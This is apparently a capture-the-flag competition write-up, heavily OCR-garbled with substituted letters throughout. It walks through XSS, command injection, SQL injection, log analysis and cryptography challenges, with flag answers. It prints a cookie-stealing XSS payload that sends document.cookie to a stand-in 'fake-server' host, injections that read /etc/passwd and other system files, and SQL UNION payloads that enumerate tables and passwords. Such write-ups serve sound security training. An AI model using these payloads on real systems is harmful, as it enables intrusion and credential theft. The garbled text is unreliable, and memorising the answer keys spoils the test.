nF1b3Q7Jmd0OycpOyZsdDsvc2NyaXB0Jmd0Ow==

echo
"Jmx0O3NjcmlwdCZndDtkb2N1bWVudC53cml0ZSgnJmx0O2lmcmFtZ
SBzcmM9JnF1b3Q7aHR0cDovL3d3dy5nb29nbGUuY29tJnF1b3Q7Jm
d0OycpOyZsdDsvc2NyaXB0Jmd0Ow==! | base64 -d

<script>document.write('<iframe
src="http://www.google.com">');</script>

The contestant shoulu notice that all BTNL entities aie actually
encoueu. So, simply taking the injecteu coue anu BASE64
encouing it will not woik, insteau the playei must fiist conveit
the BTNL entities, anu then BASE64 encoue it.

Beie is the oiiginal sciipt being injecteu to complete the
objective foi flag foui:

<script>document.location="http://fake-
server/index.php?cookie="+document.cookie;</script>

Now with the BTNL entities encoueu:

"<script>document.location="http://face-
server/index.php?cookie="+document.cookie;</script>

Anu finally the playei will neeu to BASE64 encoue the stiing:

echo "<script>document.location="http://face-
server/index.php?cookie="+document.cookie;</script>" |
base64
Jmx0O3NjcmlwdCZndDtkb2N1bWVudC5sb2NhdGlvbj0mcXVvdDtodH
RwOi8vZmFjZS1zZXJ2ZXIvaW5kZXgucGhwP2Nvb2tpZT0mcXVvdDsrZ
G9jdW1lbnQuY29va2llOyZsdDsvc2NyaXB0Jmd0Owo=

The enu iesult is the piopei value to pass to the "peima"
paiametei on the 0RL.

https://target-
four/?perma=Jmx0O3NjcmlwdCZndDtkb2N1bWVudC5sb2NhdGlvbj0
mcXVvdDtodHRwOi8vZmFjZS1zZXJ2ZXIvaW5kZXgucGhwP2Nvb2tpZT
0mcXVvdDsrZG9jdW1lbnQuY29va2llOyZsdDsvc2NyaXB0Jmd0Owo=

Foi Public Release

SM
Which ietuins the fouith flag foi taiget foui.

4th Flag Is: NCL-EHDF-9623
S. I|ag I|ve

The fifth anu final flag foi taiget foui iequiies the usei to
manipulate the page heauing.

Reauing the page souice the playei shoulu notice that one
paiticulai element is actually labeleu as the "heauing."

<h1 id="heading">Ted's Research Portal :: Search</h1>

0tilizing the }avaSciipt D/B4@*)?"&*?H$*@*)?STUD function the
playei can uiiectly inteiact with this element, anu complete the
task of changing the value to "flagS."

The object ietuineu by D/B4@*)?"&*?H$*@*)?STUD allows foi a
piopeity, "6))*2<-VW", to be manipulateu which will change
the contents of the specifieu BTNL tag.

https://target-
four/?search=<script>document.getElementById('heading').innerHTM
L='flag5';</script>&submit=Search

The above 0RL will iesult in the appiopiiate heauing change,
as iequiieu to ietiieve the fifth flag. As always the answei will
only be obtaineu once the Peimalink is geneiateu.

Bowevei this time a new iesponse is ietuineu, insteau of the
flag value.

FLAG5 XSS DETECTED $ DENIED

Cleaily the web application is uoing some limiteu filteiing, this
is akin to an ecommeice application checking foi manipulation
of an item piice, insteau of fixing the cioss-site sciipting
vulneiability itself.

At this point the playei will neeu to expeiiment with cioss-site
sciipting uetection evasion, specifically encouing.

It tuins out that this web application is simply looking foi the
value "flagS" being set as the 6))*2<-VW foi the page heauing.
Leaving all of the injecteu sciipt intact, anu simply encouing
Foi Public Release

SM
the stiing "flagS" (in eithei BTNL oi 0TF-8 encouing schemes)
will ietuin the flag.

<script>document.getElementById('heading').innerHTML='f&#
x6C;ag5';</script>

https://target-
L%3D'%26%23x66%3B%26%23x6C%3B%26%23x61%3B%26%23x
67%3B%26%23x35%3B'%3B<%2Fscript>&submit=Search

<script>document.getElementById('heading').innerHTML='&#102&#1
08&#97&#103&#53';</script>

https://target-
L%3D'%26%23102%26%23108%26%2397%26%23103%26%235
3'%3B<%2Fscript>&submit=Search

The flag woulu be ietuineu with eithei of the above
Peimalinks.

5th Flag Is: NCL-EFSF-7823
Foi Public Release

SM
G. 1arget I|ve - Command In[ect|on

Foi this puzzle the playei is piesenteu again with a web application,
this time a Netwoiking Testing inteiface. The netwoik testing
application is pioviuing numeious tools, such as: ping, tiace ioute,
BNS lookup, whois, anu configuiation file seaiching.

Foi Public Release

SM
Each of the tools woiks, peifoiming theii iespective actions. The
playei shoulu ieview the page's souice coue to finu five (S) BTNL
comments pioviuing uiiections on what is iequiieu foi each of the
five (S) flags.

<!-- There are five flags on this XSS vulnerable page --!>
<!-- Flag 1: Using PING Form, cat /etc/passwd --!>
<!-- Flag 2: Using TraceRouter Form, cat /etc/group --!>
<!-- Flag 3: Using DNS Lookup Form, cat /etc/motd --!>
<!-- Flag 4: Using Whois Form, cat /etc/shells --!>
<!-- Flag 5: Using Find Config Files Form, cat /etc/profile --!>

In Linux theie aie a few ways to enu the execution of one commanu
anu begin anothei. The pipe is one of the most commonly useu
methous to execute numeious commanus on a single line, howevei it
specifically takes the output (stuout) fiom the fiist commanu anu
enteis it (stuin) into the seconu commanu. Bepenuing on oui goal
this may not woik as we uesiie. The two othei methous specifically
execute the commanus with inuepenuent options of each othei: the
uouble ampeisanu anu the semi-colon. 0sing a uouble ampeisanu the
seconu commanu will only execute if the fiist one exits piopeily (no
eiiois), anu the semi-colon will iun the seconu commanu iegaiuless.

Nost of the challenge will actually accept any of the above thiee
methous, but this wiite-up will usually use the semi-colon, unless
otheiwise specifieu.
1. I|ag Cne

The fiist task is to use the ping tool to obtain the M*?BMN%==.D
file. The M*?BMN%==.D file contains authentication infoimation
foi Linux systems. The uiiections specifically inuicate that the
file shoulu be "B%?XD" - B%? oi concatenate is a Linux tool that
can be useu to join multiple files togethei, but in the gieat
usefulness that aie Linux utilities it uoubles as a tool
commonly useu to uump file contents to the scieen, a pipeu
commanu, oi file.

Foi Public Release

SM
While using the vaiious tools pioviueu on the page, the playei
shoulu come to the conclusion, baseu on the output, that the
values they entei aie being passeu into the ielevant Linux
commanus foi the given task.

}ust like the cioss-site sciipting vulneiabilities, if the input
accepteu fiom the usei is not fiist sanitizeu, the usei coulu
inject his oi hei own commanus.

Enteiing the following commanu injection test into the PINu
foim inuicates that input is not being sanitizeu anu commanu
injection is inueeu possible.

; iu

Which ietuins the following output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now the paiticipant simply neeus to inject the commanu they
weie pioviueu in the souice coue:

; cat /etc/passwd

Which inueeu ietuins the fiist flag.

1st Flag Is: NCL-TYIA-1682
2. I|ag 1wo

The seconu flag iequiies the contestant to cat the M*?BM&2/4N
file fiom the Tiace Route tool. The M*?BM&2/4N file is yet
anothei file that contains authentication ielateu infoimation
foi Linux.

Foi Public Release

SM
; cat /etc/group

The pievious commanu uoes not pioviue the flag noi the
expecteu output, but insteau an eiioi.

Error: Must enter a valid IP Address

It shoulu now be appaient to the playei that this foim is uoing
some limiteu input valiuation.

Pioviuing just any input befoie the semi-colon uoesn't woik,
the value must be a valiu IP auuiess.

8.8.8.8; cat /etc/group

Which pioviues the seconu flag:

2nd Flag Is: NCL-MVBC-1354
3. I|ag 1hree

The thiiu flag iequiieu the playei to output the message of the
uay file (M*?BM@/?D) thiough the BNS Lookup tool.

Knowing the pievious tool input hau some limiteu valiuation,
anu that this tool is anticipating a uomain name, the playei
woulu tiy something along the lines of the following:

google.com; cat /etc/motd

Bowevei this will not woik, anu will pioviue a new eiioi.

Error: Must End In Valid TLD (.com, .net, .org, .gov)

The eiioi is cleai in the fact that the input must enu with a TLB
(anu specifically one mentioneu in the eiioi message). Luckily
the B%? utility giacefully ignoies nonexistent files. So simply
auuing a "B/@K oi one of the othei alloweu TLBs, to the enu of
the commanu (sepaiateu by a space fiom the path to the
message of the uay) woulu woik.

google.com; cat /etc/motd .com

3rd Flag Is: NCL-AEFW-1680

Foi Public Release

SM
4. I|ag Iour

The fouith flag iequiies the M*?BM=1*$$= file to be obtaineu via
the Whois tool foim. A quick fiist attempt woulu likely iesult
in an eiioi.

; cat /etc/shells

Command Injection Found - Denied

Inueeu this tool foim is uoing input valiuation anu is
specifically blocking oui commanu injection. Tiial anu eiioi
on the playeis' pait will likely yielu the fact that it is the semi-
colon that is aleiting the web application to the commanu
injection attempt. The uouble ampeisanu will also cause the
web application to block the attempt. 0nly the pipe methou
will woik.

| cat /etc/shells

The above will get the paiticipant aiounu the commanu
injection check, but it stills iesults in an eiioi.

Error: Must End In Valid TLD (.com, .net, .org, .gov) Or be a valid IP

Combining the pieviously leaineu technique the playei can
now easily obtain this fouith flag.

| cat /etc/shells 8.8.8.8

4th Flag Is: NCL-PUIQ-2347
S. I|ag I|ve

The fifth anu final flag foi this challenge is a configuiation
seaich foim. 0nlike the othei tools, this one simply lists files
that match the enteieu text pioviueu by the usei.

Testing uiffeient seaich patteins will ieveal that the foim is
piefoiming a "L6)D" within the M*?B uiiectoiy. This flag will
iequiie some unueistanuing of how the finu commanu woiks,
specifically because the input fiom the useis is being placeu
into the miuule of the finu commanu, so simply enuing the
pievious commanu anu staiting a new one will not be possible.

Luckily L6)D has a built in execute option, which allows the
output of the commanu to be passeu to a new commanu foi
Foi Public Release

SM
- All Rights Reserved Su
execution. In this case the playei neeus to ietuin the
M*?BMN2/L6$* file.

The following injection will finu a file (M*?BM@/?D) anu pass it
to be executeu by the pioviueu commanu (B%? M*?BMN2/L6$*),
iesulting in the iequiieu file being B%?XD anu the flag being
ietuineu.

motd" -exec cat /etc/profile {} \;"

5th Flag Is: NCL-KDGD-0373
Foi Public Release

SM
- All Rights Reserved S1
n. 1arget S|x - SL In[ect|on

The sixth taiget pioviues the playei with nothing moie than a login,
asking foi a 0seiname anu Passwoiu.

0pon testing, the playei shoulu quickly leain that the Login is
vulneiable to SQL Injection, a common authentication pioblem foi
uatabase backeu web applications.

A simple SQL injection (enteieu in both the 0seiname anu Passwoiu
fielu) will iesult in the playei being loggeu in as the aumin.

% or %%=%%

Congrats admin. You are authenticated.

Theie aie howevei two (2) flags foi this challenge. The playei neeus
to obtain the passwoiu foi the 'Y=@6?1X account anu the item name foi
the item with an IB of 6.

Foitunately the web application will pioviue the SQL that was
executeu if you aie successfully authenticateu (oi, specifically, if the
queiy succeeus).

Select * from tblUsers where UserName='' or ''='' and password='' or ''=''

Now that the playei has confiimeu theii ability to inject content into
the SQL queiy, theii next task is to obtain the passwoiu foi Y=@6?1.
The above queiy ieveals a few ielevant pieces of infoimation: the
usei table name (?Z$[=*2=) anu two fielus fiom the usei table
([=*2I%@* anu N%==./2D).

The paiticipant shoulu note that the inteiface welcomes the usei by
some type of name (possibly the [=*2I%@*) upon successful login. It
is possible with this output to manipulate the queiy to ietuin the
neeueu infoimation.

Foi Public Release

SM
All futuie login attempts with this web application shoulu manipulate
only the passwoiu fielu, leaving the useiname blank (oi with a tiue
iesulting conuition like pieviously useu).

A [IU(I is a special SQL queiy connectoi that matches the output of
one queiy with that of anothei, combining them into one laige output.
The injection neeus to be a 0NI0N that ietuins the passwoiu fielu
fiom the usei table, but also limits the iesults to a single iow,
specifically the iow with the ielevant passwoiu in it. Eithei limiting
the fiist queiy can uo this oi using conuitions to iemove ietuineu
iows one-by-one. Foi obvious ieasons limiting the fiist queiy is a
much quickei methou in this case but the conuition methou is useful
when attempting to enumeiate the entiie table's contents.

The following injection shoulu ietuin the passwoiu foi 'jsmith':

' OR ''='' LIMIT 0 UNION SELECT Password FROM tblUsers WHERE UserName
= 'jsmith' ORDER BY 'UserName

The above injection will howevei fail. The ieason the queiy fails is
simple: the numbei of columns foi a [IU(I must match (same
numbei in fiist anu seconu queiy). The playei shoulu now
expeiiment with uiffeient numbeis of columns in the seconu queiy,
until it succeeus. The contestant will soon come to leain that the usei
table has foui columns anu thus the seconu queiy being injecteu must
also ietuin foui columns.

' OR ''='' LIMIT 0 UNION SELECT Password, Password, Password, Password,
Password FROM tblUsers WHERE UserName = 'jsmith' ORDER BY 'UserName

Which pioviues us the flag in the welcome message output.

Congrats NCL-DGSO-4432. You are authenticated.

Baseu on flag foimatting, anu the obvious intention of oui injection,
the flag is cleaily iuentifiable in the welcome message. Now the
paiticipant will move on to the item with an IB of 6. Common sense
woulu inuicate that the items aie not stoieu in the usei table; of
couise this is veiifiable by enumeiating the entiie table with the
technique uetaileu pieviously.

Thus fai theie has been no inuication of the name of the seconu table,
so that must be queiieu befoie we can obtain the piopei item
infoimation.
Foi Public Release

SM
- All Rights Reserved SS
NySQL happens to have a useful table, UI#(\V>-U(I"FA<HV>K which
contains ielevant infoimation like the names of tables anu columns,
etc. This schema can be queiieu, like any othei table, to ietuin the
infoimation the playei is aftei. The following injection will ietuin the
fiist table in the uatabase:

' OR ''='' LIMIT 0 UNION SELECT table_name, table_name, table_name,
table_name, table_name FROM INFORMATION_SCHEMA.TABLES WHERE
table_schema != 'mysql' AND table_schema != 'information_schema' AND
table_schema != 'performance_schema' ORDER BY 'UserName

The queiy that is built as a iesult of this injection, will fiist queiy anu
then ietuin zeio iesults fiom the usei table, anu then union with the
seconu queiy, which is iequesting a table name fiom the infoimation
schema, iemoving known uefaults fiom the output.

Congrats tblInventory. You are authenticated.

It just so happens that the fiist table is nameu "?Z$)7*)?/2T." Fuithei
queiies woulu confiim that this is the only othei table in the uatabase.
Next the playei will neeu to leain the columns within the inventoiy
table. Again the UI#(\V>-U(I"FA<HV> can be queiieu foi this
infoimation.

' 0R ''='' LINIT u 0NI0N SELECT column_name, column_name,
column_name, column_name, column_name FR0N
INF0RNATI0N_SCBENA.C0L0NNS WBERE table_name =
'tblInventoiy' 0RBER BY '0seiName

Congrats item. You are authenticated.

The above injection pioviues us with one ielevant column, 6?*@. This
is likely the column playei neeus to ietuin foi the flag value. But fiist
the contestant must leain the name of the item iuentification numbei
column. 0tilizing the pievious queiy with an auueu conuition to
ignoie the "6?*@" column shoulu pioviue the next column in the
inventoiy table.

Congrats itemNum. You are authenticated.

Now the playei has the iequiieu infoimation to ciaft the final queiy
foi the last flag of taiget six, anu iounu one.

' OR ''='' LIMIT 0 UNION SELECT item, item, item, item, item FROM
tblInventory WHERE itemNum = 6 ORDER BY 'UserName

Congrats NCL-GSHI-9834. You are authenticated.
Foi Public Release

SM

III. kound 1wo - Log Ana|ys|s

In the seconu iounu paiticipants weie to iecovei fifty (Su) flags, founu
within six (6) uiffeient files (five log files, anu one netwoik uata captuie).
The files weie as follows: Winuows Secuiity Log, Coiiupteu Winuows
Secuiity Log, Linux Authentication Log, Coiiupteu Linux Authentication Log,
Apache Logs, Netwoik Bata Captuie.

A. Scenar|o

uieat }ob Reciuit! You uemonstiateu some goou skills uuiing that fiist
FCA Captuie-the-Flag Exeicise!

Now, the time has come foi some ieal cybei-sleuthing. It seems we
have oui fiist big case foi you.

0ne of oui client agencies was compiomiseu. Luckily foi us, they weie
able to get some logs, but sauly the attackei coveieu some of theii
tiacks as well. The goou news is the client was able to iecovei some of
the uelete logs. The bau news is that the uata is cleaily coiiupteu, anu
they weien't able to figuie out how to get them open again.

Beie is what we know. An uniuentifieu attackei accesseu a Winuows
seivei; the next uay a Linux seivei was compiomiseu; anu finally
theii web site was uefaceu. We've been given six files: a Winuows
Secuiity Log, a Coiiupteu Winuows Secuiity Log, a Linux
Authentication Log, a Coiiupteu Linux Authentication Log, the Apache
Log Files, anu a Netwoik Bata Captuie fiom the compiomiseu Web
seivei.

0sing these files, please tiy to uncovei as much infoimation as you
can about the attacks. We have a questionnaiie to help guiue you
thiough anu help us finu the ielevant infoimation.

uoou luck ieciuit!
Foi Public Release

SM
8. I|ags
Name Server

Value
Which user changed the system name?
127.0.3.1 (Windows
Security Log)
100
Which user had a failed brute force attack run against it?
127.0.3.1 (Windows
Security Log)
200
Which user account was succesfully brute forced?
127.0.3.1 (Windows
Security Log)
200
Which IP address launched the brute force?
127.0.3.1 (Windows
Security Log)
200
After obtaining valid credentials, the attacker logs into the system via
what protocol?
127.0.3.1 (Windows
Security Log)
300
The attacker adds which user account to the system?
127.0.3.1 (Windows
Security Log)
300
Which group, other than Administrators was the attakers account added?
127.0.3.1 (Windows
Security Log)
300
Which new group did the attacker create?
127.0.3.1 (Windows
Security Log)
300
At what time did the attacker finally logout of the system?
127.0.3.1 (Windows
Security Log)
400
Which user attempted to add themselves to the Administrator group?
127.0.3.1 (Windows
Security Log)
500
Which account did the attacker login with?
127.0.3.2 (Corrupt
Windows Security Log)
600
What time did the attacker login?
127.0.3.2 (Corrupt
600
What protocol did the attacker use to login?
127.0.3.2 (Corrupt
600
What time was the last action logged by our attacker?
127.0.3.2 (Corrupt
700
The attacker transferred a file to the system via which protocol?
127.0.3.2 (Corrupt
700
During login the attackers file is automatically run, what is the name of
the file?
127.0.3.2 (Corrupt
700
After the attacker connects back via their trojan they gain SYSTEM
privledges, what is the "New Process ID" for the process in which they
127.0.3.2 (Corrupt
800
Foi Public Release

SM
Name Server

Value
obtain SYSTEM privledges?
Which binary was run with "New Process ID" of 2185560096?
127.0.3.2 (Corrupt
900
A file named svchost.exe was stored within which directory under Joe
Johnson's TEMP directory?
127.0.3.2 (Corrupt
1000
Which other file was created in Joe Johnson's TEMP directory?
127.0.3.2 (Corrupt
1000
Which user installed and configured SSH access to the system?
127.0.3.3 (Linux
Authentication Log)
100
Which user had a failed brute force attack against them?
127.0.3.3 (Linux
Authentication Log)
200
Which user account was successfully brute forced?
127.0.3.3 (Linux
Authentication Log)
200
Which IP address launched the brute force attacks?
127.0.3.3 (Linux
Authentication Log)
200
Which IP address did the attack than use to connect to the system?
127.0.3.3 (Linux
Authentication Log)
300
Which protocol did the attack use to login to the system?
127.0.3.3 (Linux
Authentication Log)
300
What was the first file the attacker read once obtaining access to the
system?
127.0.3.3 (Linux
Authentication Log)
300
Which user account did the attacker add to the system?
127.0.3.3 (Linux
Authentication Log)
300
At what time did the Authentication Token get altered for the user
abrown?
127.0.3.3 (Linux
Authentication Log)
400
Which IP address did the attacker telnet into from the compermised host?
127.0.3.3 (Linux
Authentication Log)
500
Which user account does the attack login with?
127.0.3.4 (Corrupt Linux
Authentication Log)
600
What IP address is the attacker coming from?
Authentication Log)
600
Which protocol did the attacker use to login?
Authentication Log)
600
To which file did the attacker edit to provide their account root level
permissions?
Authentication Log)
700
Foi Public Release

SM
Name Server

Value
The attacker transfers a trojan to the system using which protocol?
Authentication Log)
700
The attacker modifies which file to ensure the trojan is executed on
system startup?
Authentication Log)
700
Which permission does the attacker give the trojan to ensure it has
elevated privledges regarless of who runs it?
Authentication Log)
800
What type of attack did the user launch at 09:47:27?
Authentication Log)
900
The attacker changed the default permission for all future files and
directories to what? (use long symbloic format)
Authentication Log)
1000
The global shell profile was changed, what command was added to this
profile?
Authentication Log)
1000
Which IP address was used to launch a Nikto scan? 127.0.3.5 (Apache Logs)

100
Which IP address was used to launch a Nessus scan? 127.0.3.5 (Apache Logs)

100
What time did the NMAP scan start? 127.0.3.5 (Apache Logs)

200
Which browser was the attacker using when visiting the website? 127.0.3.5 (Apache Logs)

300
Which IP address did the attacker use when manually testing the web
service?
127.0.3.5 (Apache Logs)

500
What HTTP Request Method is used to deface the website?
127.0.0.6 (Network Data
Capture)
200
What is the sequence number for the packet which defaced the website?
Capture)
300
What is the sequence number for the first packet that contains invalid TCP
flag options?
Capture)
1000
Which Snort Community Signature (ID) should fire on the web defacement?
Capture)
1500
What flag was present on the defaced website?
Capture)
5000

Foi Public Release

SM
C. W|ndows Secur|ty Log

The pioviueu Winuow Secuiity Log is in the Event viewei Log foimat,
which shoulu be openeu with the Winuows Event viewei. Aftei
opening the log file, the flags aie self-explanatoiy; each is simply
founu within the log. 0ne shoitcut that might expeuite the seaich foi
the flag answeis is to save the log in the Comma Sepaiateu value
(CSv) foimat, anu then use a text baseu euitoi to peifoim the iequiieu
seaiches.

I|ag uest|ons I|ag Answers
Whlch user changed Lhe sysLem name? [[ohnson
Whlch user had a falled bruLe force aLLack run agalnsL lL? Landerson
Whlch user accounL was successfully bruLe forced? [smlLh
Whlch l address launched Lhe bruLe force? 192.168.243.131
AfLer obLalnlng valld credenLlals, Lhe aLLacker logs lnLo
Lhe sysLem vla whaL proLocol?
LelneL
1he aLLacker adds whlch user accounL Lo Lhe sysLem? nsanders
Whlch group, oLher Lhan AdmlnlsLraLors, was Lhe
aLLacker accounL added?
8ackup CperaLors
Whlch new group dld Lhe aLLacker creaLe? SupporL
AL whaL Llme dld Lhe aLLacker flnally logouL of Lhe
sysLem?
12:47:13M
Whlch user aLLempLed Lo add Lhemselves Lo Lhe
AdmlnlsLraLor group?
emlller

D. Corrupt W|ndows Secur|ty Log

Foi this challenge the playei was pioviueu a Coiiupteu Winuows
Secuiity Log. This log was also in the Winuows Event viewei foimat,
howevei it woulu fail to open in the Winuows Event viewei.

Foi Public Release

SM
Lucky foi the playei, they have the pieviously pioviueu non-coiiupt
log to compaie against. 0pening the coiiupteu log file in a Bex Euitoi
shoulu ieveal some useful infoimation.

0ne thing is cleai, coiiupt oi not, the file still contains peitinent log
infoimation. File types aie veiy often ueteimineu by the veiy
beginning of the file, this is a common place foi pioblems to begin.
Compaiing the beginning of the coiiupteu file.

To the known valiu file will ieveal the issue.

The playei now neeus to simply piepenu the file with the piopei
hexauecimal value.

30000000

At this point the playei can loau the log in Event viewei anu ietiieve
the flags.
Foi Public Release

SM

Whlch accounL dld Lhe aLLacker logln wlLh? nsanders
WhaL Llme dld Lhe aLLacker logln? 08:43:03AM
WhaL proLocol dld Lhe aLLacker use Lo logln? LelneL
WhaL Llme was Lhe lasL acLlon logged by our aLLacker? 10:06:38AM
1he aLLacker Lransferred a flle Lo Lhe sysLem vla whlch
proLocol? fLp
uurlng logln Lhe aLLackers flle ls auLomaLlcally run, whaL
ls Lhe name of Lhe flle? a.exe
AfLer Lhe aLLacker connecLs back vla Lhelr Lro[an Lhey
galn S?S1LM prlvledges, whaL ls Lhe "new rocess lu"
for Lhe process ln whlch Lhey obLaln S?S1LM prlvledges? 2184204320
Whlch blnary was run wlLh "new rocess lu" of
2183360096? cscrlpL.exe
A flle named svchosL.exe was sLored wlLhln whlch
dlrecLory under !oe !ohnson's 1LM dlrecLory? rad418u4.Lmp
Whlch oLher flle was creaLed ln !oe !ohnson's 1LM
dlrecLory? CvZrvu.exe

L. L|nux Authent|cat|on Log

Foi this challenge the paiticipant is given a Linux Authentication Log,
which contains a laige numbei of log entiies, on which flag questions
aie baseu. }ust like the non-coiiupteu Winuows log; this section of
flags is self-explanatoiy. The contestant simply neeus to ieau the logs
anu finu the ielevant entiies coiiesponuing to the flags. It shoulu be
noteu that the filename enueu with a ""!" which shoulu have been an
inuicatoi to the log files foimat. Linux systems often iotate logs on a
time oi size basis, once a log ieaches the pieuefineu thiesholu, it is
compiesseu anu ienameu to piepenu a numbei at the enu (1 being
the most iecently iotateu log, up thiough whatevei maximum is
configuieu, being the last). So in this case the playei woulu inueeu
neeu to uncompiess the log file befoie pioceeuing.

gzip $d $S ".1! NCL-R2-LAUTH.1

less NCL-R2-LAUTH
Foi Public Release

SM

Whlch user lnsLalled and conflgured SSP access Lo Lhe sysLem? abrown
Whlch user had a falled bruLe force aLLack agalnsL Lhem? mdavls
Whlch user accounL was successfully bruLe forced? Landerson
Whlch l address launched Lhe bruLe force aLLacks?
192.168.243.1
33
Whlch l address dld Lhe aLLack Lhan use Lo connecL Lo Lhe sysLem?
192.168.243.1
91
Whlch proLocol dld Lhe aLLack use Lo logln Lo Lhe sysLem? ssh
WhaL was Lhe flrsL flle Lhe aLLacker read once obLalnlng access Lo Lhe
sysLem? /eLc/shadow
Whlch user accounL dld Lhe aLLacker add Lo Lhe sysLem? [bowers
AL whaL Llme dld Lhe AuLhenLlcaLlon 1oken geL alLered for Lhe user
abrown? 13:04:13
Whlch l address dld Lhe aLLacker LelneL lnLo from Lhe compermlsed
hosL?
192.168.243.2
34

I. Corrupt L|nux Authent|cat|on Log

The playei is pioviueu with a Linux Authentication log that is
coiiupteu. The file is compiesseu, uue to log iotation, anu a poition of
the compiesseu file was tiuncateu, iesulting in its coiiuption. 0nce
openeu, the paiticipant can easily answei the ielevant flag questions,
but simply using &J6N won't uo.

gzip -d -S ".1" blah.1

gzip: blah.1: unexpected end of file

But uZIP is a iesilient compiession, anu theie aie a vast amount of
Linux tools capable of helping us iecoveiy the uata fiom within this
log file. In fact even &J6N itself is capable of ieauing the non-tiuncateu
uata, simply by piping it the file contents. Alteinatively the contestant
can use JB%? oi some othei uZIP compatible tool.

zcat NCL-R2-CLAUTH.log.1

At this point the playei can now ieview the log entiies anu finu the
iequiieu flag answeis.
Foi Public Release

SM

Whlch user accounL does Lhe aLLack logln wlLh? [bowers
WhaL l address ls Lhe aLLacker comlng from? 192.168.243.131
Whlch proLocol dld Lhe aLLacker use Lo logln? ssh
1o whlch flle dld Lhe aLLacker edlL Lo provlde Lhelr
accounL rooL level permlsslons? /eLc/group
1he aLLacker Lransfers a Lro[an Lo Lhe sysLem uslng
whlch proLocol? hLLp
1he aLLacker modlfles whlch flle Lo ensure Lhe Lro[an ls
execuLed on sysLem sLarLup? /eLc/rc.local
Whlch permlsslon does Lhe aLLacker glve Lhe Lro[an Lo
ensure lL has elevaLed prlvledges regarless of who
runs lL? seLuld
WhaL Lype of aLLack dld Lhe user launch aL 09:47:27? fork bomb
1he aLLacker changed Lhe defaulL permlsslon for all
fuLure flles and dlrecLorles Lo whaL? (use long
symblolc formaL) -rw-rw-rw-
1he global shell proflle was changed, whaL command
was added Lo Lhls proflle? exlL

G. Apache Log

This puzzle pioviues the contestant with an aichive containing
Apache Access anu Eiioi logs. With these files, the playei simply
neeus to locate the ielevant entiies anu answei the flag questions.

Whlch l address was used Lo launch a nlkLo scan? 192.168.243.13
Whlch l address was used Lo launch a nessus scan? 192.168.243.113
WhaL Llme dld Lhe nMA scan sLarL? 11:43:03
Whlch browser was Lhe aLLacker uslng when vlslLlng
Lhe webslLe? konqueror
Whlch l address dld Lhe aLLacker use when manually
LesLlng Lhe web servlce? 192.168.243.113

Foi Public Release

SM
n. Network Data Capture

In this puzzle the playei is pioviueu a collection of captuieu packets.
The packets aie stoieu in the inuustiy stanuaiu $6ZNB%N foimat. As
such the contestant shoulu utilize a $6ZNB%N compatible netwoik tiaffic
analyzei, such as ]62*=1%2C oi ?BND4@N.

The fiist thiee flags aie obtainable by simply analyzing the tiaffic.

tcpdump $nnr NCL-R2-ND.pcap | less

tcpdump $Xnnr NCL-R2-ND.pcap | less

tcpdump $Annr NCL-R2-ND.pcap | less

The fiist flag question asks which BTTP Request Nethou is useu to
ueface the website. Knowing the funuamentals of BTTP shoulu
quickly aleit the playei to the usage of the "E[-" methou in the tiaffic.

15:21:47.113411 IP 192.168.245.131.58246 > 192.168.245.141.80:
Flags [P.], seq 1:235, ack 1, win 913, options [nop,nop,TS val 53158427
ecr 6560569], length 234
E...R.@.@.z............P..p.t.,t....n......
.+"..d.9PUT /admin/update.php HTTP/1.1
Host: 192.168.245.141
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: text/plain
Content-Length: 67

<body bgcolor='black'><center><img src='owned.png'></center></body>

Fuithei ieview claiifies that inueeu the "E[-" commanu was useu to
ueface the website.

The next two flag questions simply iequiie fuithei ieview anu
seaiching of the netwoik tiaffic. The last flag question howevei is
quite a laige amount of points.
Foi Public Release

SM
The question piesenteu is what the image (now being uisplayeu on
the uefaceu website) says. This iequiies the playei to peifoim uata
caiving on the netwoik tiaffic to extiact the image (which is cleaily
sent in the tiaffic).

The ?BNG?2%B? utility uoes a gieat job of extiacting files fiom a netwoik
stieam oi $6ZNB%N file.

tcpxtract -f NCL-R2-ND.pcap

Found file of type "gif" in session [192.168.245.141:20480 ->
192.168.245.131:21376], exporting to 00000000.gif
192.168.245.131:21376], exporting to 00000001.gif
192.168.245.131:21632], exporting to 00000002.gif
192.168.245.131:28032], exporting to 00000003.gif
192.168.245.131:28544], exporting to 00000004.gif
Found file of type "jpg" in session [192.168.245.141:20480 ->
192.168.245.131:28288], exporting to 00000005.jpg
Found file of type "png" in session [192.168.245.131:20480 ->
192.168.245.141:42439], exporting to 00000006.png
Found file of type "png" in session [192.168.245.141:20480 ->
192.168.245.131:36992], exporting to 00000007.png

Foi Public Release

SM
IV. kound 1hree - Cryptography

The thiiu iounu of the NCL competition incluueu a numbei of ciyptogiaphy
ielateu challenges, ianging fiom simple ciyptogiaphy systems to complex
steganogiaphy puzzles.

A. Scenar|o

Congiatulations on yet anothei job well uone! Youi log analysis
iepoits helpeu us piece togethei what ieally happeneu uuiing the
attack on oui client's systems. In fact, you've also helpeu us iuentify
some weaknesses in oui client's cybeisecuiity postuie.

Baseu on the infoimation you uncoveieu uuiing the log analysis,
we've come to unueistanu that passwoiu complexity was seveiely
lacking at oui client's oiganization. Theiefoie, we have askeu the
client to senu ovei theii passwoiu files.

Baseu on youi log analysis woik, the client iuentifieu some auuitional
clues that the 'not so caieful' attackei left behinu. 0nfoitunately, most
of the uata the attackei left behinu is enciypteu oi encoueu in some
fashion.

Youi mission is as follows:
Bo some passwoiu secuiity analysis anu testing on the client's
passwoiu files
uo thiough the aitifacts fiom the client's attack anu see what you can
uncovei

We neeu to secuie this system, so this uoesn't happen again.

Thanks again foi youi ueuicateu seivice anu a job well uone!
Foi Public Release

SM
8. I|ags

Name Server

Value
What hashing algorithm is in use for Emily Miller's account? 127.0.0.1 (Linux Passwords)

100
What hashing algorithm Is in use for Tom Anderson's account? 127.0.0.1 (Linux Passwords)

100
What hashing algorithm is in use for Amanda Williams's account? 127.0.0.1 (Linux Passwords)

100
What hashing algorithm is in use for Michael Davis's account? 127.0.0.1 (Linux Passwords)

100
What hashing algorithm is in use for Daniel Jameson's account? 127.0.0.1 (Linux Passwords)

100
What is the plaintext password for Emily Miller's account? 127.0.0.1 (Linux Passwords)

200
What is the plaintext password for Tom Anderson's account? 127.0.0.1 (Linux Passwords)

200
What is the plaintext password for Amanda Williams's account? 127.0.0.1 (Linux Passwords)

200
What is the plaintext password for Michael Davis's account? 127.0.0.1 (Linux Passwords)

200
What is the plaintext password for Daniel Jameson's account? 127.0.0.1 (Linux Passwords)

200
